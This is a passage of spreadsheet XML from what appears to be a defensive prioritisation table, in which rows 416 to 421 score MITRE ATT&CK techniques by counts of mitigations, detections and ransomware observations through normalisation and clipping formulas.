        <v>8.3333333333333332E-3</v>
      </c>
      <c r="AQ416" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.777777777777778E-2</v>
      </c>
      <c r="AR416" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.777777777777778E-2</v>
      </c>
      <c r="AS416" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT416" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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17" spans="1:47" ht="48">
      <c r="A417" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.8942857142857157E-3</v>
      </c>
      <c r="B417" s="25">
        <f>SUM(H417,M417,V417)*(1+SUM(AE417,AG417,AI417,AK417,AM417))</f>
        <v>8.8942857142857157E-2</v>
      </c>
      <c r="C417" s="25" t="s">
        <v>1595</v>
      </c>
      <c r="D417" s="25" t="s">
        <v>1596</v>
      </c>
      <c r="E417" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F417" s="51">
        <v>0</v>
      </c>
      <c r="G417" s="51">
        <v>1</v>
      </c>
      <c r="H417">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I417">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J417">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K417">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L417">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M417" s="25">
        <v>0</v>
      </c>
      <c r="N417" s="51">
        <v>0</v>
      </c>
      <c r="O417" s="51">
        <v>0</v>
      </c>
      <c r="P417" s="51">
        <v>0</v>
      </c>
      <c r="Q417" s="51">
        <v>2</v>
      </c>
      <c r="R417" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S417" s="51">
        <v>2</v>
      </c>
      <c r="T417" s="51"/>
      <c r="U417" s="51">
        <v>0</v>
      </c>
      <c r="V417" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428574E-2</v>
      </c>
      <c r="W417">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X417">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y417">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z417">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA417">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB417">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC417" s="29" t="s">
        <v>938</v>
      </c>
      <c r="AD417" s="25" t="str" cm="1">
        <f t="array" ref="AD417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE417" s="25">
        <f>IF(AD417="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF417" s="25" t="str" cm="1">
        <f t="array" ref="AF417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC417)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG417" s="25">
        <f>IF(AF417="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH417" s="25" t="str" cm="1">
        <f t="array" ref="AH417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC417)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI417" s="25">
        <f>IF(AH417="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ417" s="25" t="str" cm="1">
        <f t="array" ref="AJ417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK417" s="25">
        <f>IF(AJ417="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL417" s="25" t="str" cm="1">
        <f t="array" ref="AL417">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC417)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM417" s="25">
        <f>IF(AL417="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN417" s="60">
        <v>0</v>
      </c>
      <c r="AO417" s="51">
        <v>0</v>
      </c>
      <c r="AP417" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.8942857142857157E-3</v>
      </c>
      <c r="AQ417" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.9647619047619051E-2</v>
      </c>
      <c r="AR417" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.9647619047619051E-2</v>
      </c>
      <c r="AS417" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT417" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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18" spans="1:47" ht="48">
      <c r="A418" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0433333333333337E-2</v>
      </c>
      <c r="B418" s="25">
        <f>SUM(H418,M418,V418)*(1+SUM(AE418,AG418,AI418,AK418,AM418))</f>
        <v>0.17100000000000004</v>
      </c>
      <c r="C418" s="25" t="s">
        <v>1597</v>
      </c>
      <c r="D418" s="25" t="s">
        <v>215</v>
      </c>
      <c r="E418" s="25" t="s">
        <v>1598</v>
      </c>
      <c r="F418" s="51">
        <v>1</v>
      </c>
      <c r="G418" s="51">
        <v>1</v>
      </c>
      <c r="H418" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I418">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J418">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K418">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L418">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M418" s="25">
        <v>0</v>
      </c>
      <c r="N418" s="51">
        <v>0</v>
      </c>
      <c r="O418" s="51">
        <v>0</v>
      </c>
      <c r="P418" s="51">
        <v>0</v>
      </c>
      <c r="Q418" s="51">
        <v>0</v>
      </c>
      <c r="R418" s="51"/>
      <c r="S418" s="51">
        <v>0</v>
      </c>
      <c r="T418" s="52" t="s">
        <v>216</v>
      </c>
      <c r="U418" s="51">
        <v>3</v>
      </c>
      <c r="V418" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428571E-2</v>
      </c>
      <c r="W418">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>3</v>
      </c>
      <c r="X418">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Y418">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>5.4545454545454543E-2</v>
      </c>
      <c r="Z418">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA418">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB418">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC418" s="29" t="s">
        <v>1599</v>
      </c>
      <c r="AD418" s="25" t="str" cm="1">
        <f t="array" ref="AD418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC418)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE418" s="25">
        <f>IF(AD418="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF418" s="25" t="str" cm="1">
        <f t="array" ref="AF418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC418)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG418" s="25">
        <f>IF(AF418="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH418" s="25" t="str" cm="1">
        <f t="array" ref="AH418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC418)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI418" s="25">
        <f>IF(AH418="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ418" s="25" t="str" cm="1">
        <f t="array" ref="AJ418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC418)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK418" s="25">
        <f>IF(AJ418="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL418" s="25" t="str" cm="1">
        <f t="array" ref="AL418">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC418)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM418" s="25">
        <f>IF(AL418="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN418" s="52">
        <v>1</v>
      </c>
      <c r="AO418" s="51">
        <v>1</v>
      </c>
      <c r="AP418" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0433333333333337E-2</v>
      </c>
      <c r="AQ418" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.7000000000000016E-2</v>
      </c>
      <c r="AR418" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.7000000000000016E-2</v>
      </c>
      <c r="AS418" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT418" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU41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19" spans="1:47" ht="63.95">
      <c r="A419" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.043333333333333E-2</v>
      </c>
      <c r="B419" s="25">
        <f>SUM(H419,M419,V419)*(1+SUM(AE419,AG419,AI419,AK419,AM419))</f>
        <v>0.17099999999999999</v>
      </c>
      <c r="C419" s="25" t="s">
        <v>1600</v>
      </c>
      <c r="D419" s="25" t="s">
        <v>1601</v>
      </c>
      <c r="E419" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F419" s="51">
        <v>1</v>
      </c>
      <c r="G419" s="51">
        <v>1</v>
      </c>
      <c r="H419" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I419">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J419">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K419">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L419">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M419" s="25">
        <v>0</v>
      </c>
      <c r="N419" s="51">
        <v>1</v>
      </c>
      <c r="O419" s="51">
        <v>2</v>
      </c>
      <c r="P419" s="51">
        <v>0</v>
      </c>
      <c r="Q419" s="51">
        <v>3</v>
      </c>
      <c r="R419" s="51"/>
      <c r="S419" s="51">
        <v>0</v>
      </c>
      <c r="T419" s="51"/>
      <c r="U419" s="51">
        <v>0</v>
      </c>
      <c r="V419" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W419">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X419">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y419">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z419">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA419">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB419">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC419" s="29" t="s">
        <v>107</v>
      </c>
      <c r="AD419" s="25" t="str" cm="1">
        <f t="array" ref="AD419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC419)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE419" s="25">
        <f>IF(AD419="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF419" s="25" t="str" cm="1">
        <f t="array" ref="AF419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC419)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG419" s="25">
        <f>IF(AF419="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH419" s="25" t="str" cm="1">
        <f t="array" ref="AH419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC419)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI419" s="25">
        <f>IF(AH419="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ419" s="25" t="str" cm="1">
        <f t="array" ref="AJ419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC419)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK419" s="25">
        <f>IF(AJ419="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL419" s="25" t="str" cm="1">
        <f t="array" ref="AL419">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC419)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM419" s="25">
        <f>IF(AL419="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN419" s="58">
        <v>1</v>
      </c>
      <c r="AO419" s="51">
        <v>1</v>
      </c>
      <c r="AP419" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.043333333333333E-2</v>
      </c>
      <c r="AQ419" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.6999999999999995E-2</v>
      </c>
      <c r="AR419" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.6999999999999995E-2</v>
      </c>
      <c r="AS419" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT419" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU41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20" spans="1:47" ht="48">
      <c r="A420" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7887619047619047E-2</v>
      </c>
      <c r="B420" s="25">
        <f>SUM(H420,M420,V420)*(1+SUM(AE420,AG420,AI420,AK420,AM420))</f>
        <v>0.14554285714285714</v>
      </c>
      <c r="C420" s="25" t="s">
        <v>1602</v>
      </c>
      <c r="D420" s="25" t="s">
        <v>1603</v>
      </c>
      <c r="E420" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F420" s="51">
        <v>1</v>
      </c>
      <c r="G420" s="51">
        <v>1</v>
      </c>
      <c r="H420" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I420">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J420">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K420">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L420">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M420" s="25">
        <v>0</v>
      </c>
      <c r="N420" s="51">
        <v>0</v>
      </c>
      <c r="O420" s="51">
        <v>5</v>
      </c>
      <c r="P420" s="51">
        <v>0</v>
      </c>
      <c r="Q420" s="51">
        <v>1</v>
      </c>
      <c r="R420" s="51"/>
      <c r="S420" s="51">
        <v>0</v>
      </c>
      <c r="T420" s="51"/>
      <c r="U420" s="51">
        <v>0</v>
      </c>
      <c r="V420" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>2.8571428571428567E-2</v>
      </c>
      <c r="W420">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X420">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y420">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z420">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA420">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB420">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC420" s="29" t="s">
        <v>1604</v>
      </c>
      <c r="AD420" s="25" t="str" cm="1">
        <f t="array" ref="AD420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC420)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE420" s="25">
        <f>IF(AD420="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF420" s="25" t="str" cm="1">
        <f t="array" ref="AF420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC420)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG420" s="25">
        <f>IF(AF420="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH420" s="25" t="str" cm="1">
        <f t="array" ref="AH420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC420)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI420" s="25">
        <f>IF(AH420="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ420" s="25" t="str" cm="1">
        <f t="array" ref="AJ420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC420)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK420" s="25">
        <f>IF(AJ420="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL420" s="25" t="str" cm="1">
        <f t="array" ref="AL420">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC420)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM420" s="25">
        <f>IF(AL420="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN420" s="52">
        <v>1</v>
      </c>
      <c r="AO420" s="51">
        <v>1</v>
      </c>
      <c r="AP420" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7887619047619047E-2</v>
      </c>
      <c r="AQ420" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.8514285714285711E-2</v>
      </c>
      <c r="AR420" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.8514285714285711E-2</v>
      </c>
      <c r="AS420" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT420" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU42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21" spans="1:47" ht="32.1">
      <c r="A421" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.540285714285714E-2</v>
      </c>
      <c r="B421" s="25">
        <f>SUM(H421,M421,V421)*(1+SUM(AE421,AG421,AI421,AK421,AM421))</f>
        <v>0.1540285714285714</v>
      </c>
      <c r="C421" s="25" t="s">
        <v>1605</v>
      </c>
      <c r="D421" s="25" t="s">
        <v>1606</v>
      </c>
      <c r="E421" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F421" s="51">
        <v>1</v>
      </c>
      <c r="G421" s="51">
        <v>1</v>
      </c>
      <c r="H421" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I421">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J421">
